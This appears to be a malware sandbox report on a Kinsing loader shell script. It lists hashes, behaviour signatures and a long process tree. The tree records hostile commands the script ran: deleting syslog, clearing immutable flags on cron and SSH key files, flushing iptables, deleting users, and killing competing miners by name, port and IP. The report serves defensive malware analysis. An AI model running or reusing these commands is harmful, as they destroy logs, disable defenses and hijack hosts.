Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
92s -
max time network
137s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
-
submitted
24/02/2025, 03:50
General
-
Target
ec1213394717932b0062136ce96d42092e9120da1e32cce7ff355de67c7b6988.sh
-
Size
27KB
-
MD5
e1753baa1b118dc24f6dc0ba82fdafc0
-
SHA1
3906dedc8d5623bf5ab739ee156a881d011630b2
-
SHA256
ec1213394717932b0062136ce96d42092e9120da1e32cce7ff355de67c7b6988
-
SHA512
cd8208faf30c801fb4b41114d566eeba58629dd5658d0e82883b875fa4bd24a00ec813fd2e05c39afa158cd0bfae40e17bbfc810e649fbf873037badde8d25ce
-
SSDEEP
384:p7pQBDf6jlpTWg3vMGQiKMvU/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeUoJ5:p7wVFNcDAFLcIwgnoYq0xFB/aps
Score
10/10
Malware Config
Signatures
-
Kinsing
Kinsing is a loader written in Golang.
-
Kinsing family
-
Kinsing payload 1 IoCs
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Creates/modifies Cron job 1 TTPs 33 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Disables AppArmor 28 IoCs
Disables AppArmor security module.
-
Disables SELinux 1 TTPs 1 IoCs
Disables SELinux security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 33 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ec1213394717932b0062136ce96d42092e9120da1e32cce7ff355de67c7b6988.sh/tmp/ec1213394717932b0062136ce96d42092e9120da1e32cce7ff355de67c7b6988.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
-
/bin/rmrm -rf /var/log/syslog2⤵
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
-
-
/usr/bin/chattrchattr -R -i /var/spool/cron2⤵
-
-
/usr/bin/chattrchattr -i /etc/crontab2⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOYS-0000Bm-Rb4⤵
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOYS-0000Bp-Rb4⤵
-
-
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵
-
-
-
/usr/sbin/userdeluserdel akay2⤵
-
-
/usr/sbin/userdeluserdel vfinder2⤵
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵
-
-
/bin/rmrm -rf /tmp/keys2⤵
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/bin/grepgrep -i "[y]unjing"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep 185.71.65.2382⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 140.82.52.872⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :1432⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep :22222⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep :33892⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :44442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66662⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66652⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66672⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :77772⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :84442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33472⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :144442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :144332⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :135312⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep "sleep 60"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep ./crun2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep -vw kdevtmpfsi2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "kworker -c\\"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep log_2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep systemten2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 103⤵
-
-
/usr/local/bin/killkill -9 103⤵
-
-
/usr/sbin/killkill -9 103⤵
-
-
/usr/bin/killkill -9 103⤵
-
-
/sbin/killkill -9 103⤵
-
-
/bin/killkill -9 103⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep netns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep voltuned2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep darwin2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/dl2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/ddg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/pprt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/ppol2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/jmx*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 45.76.122.922⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.38.191.1782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.15.56.1612⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 86s.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aGTSGJJp2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep nMrfmnRa2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep PuNY5tm22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep I0r8Jyyt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/bin/grepgrep AgdgACUD2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep uiZvwxG82⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep BtwXn5qH2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 3XEzey2T2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep t2tKrCSZ2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HD7fcBgg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep zXcDajSs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 3lmigMo2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AkMK4A22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AJ2AkKe2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0302⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0312⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0322⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep C4iLM4L2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /boot/vmlinuz2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep i4b503a52cc52⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep nqscheduler2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵
-
-
/bin/grepgrep "]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 0kwti6ut420t2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵
-
-
/bin/grepgrep -v _2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep -v /2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "\\[^"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rsync2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchd0g2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 158.69.133.18:82202⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep gitee.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 104.248.4.1622⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 89.35.39.782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /dev/shm/z3.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kthrotlds2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep ksoftirqds2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep netdns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
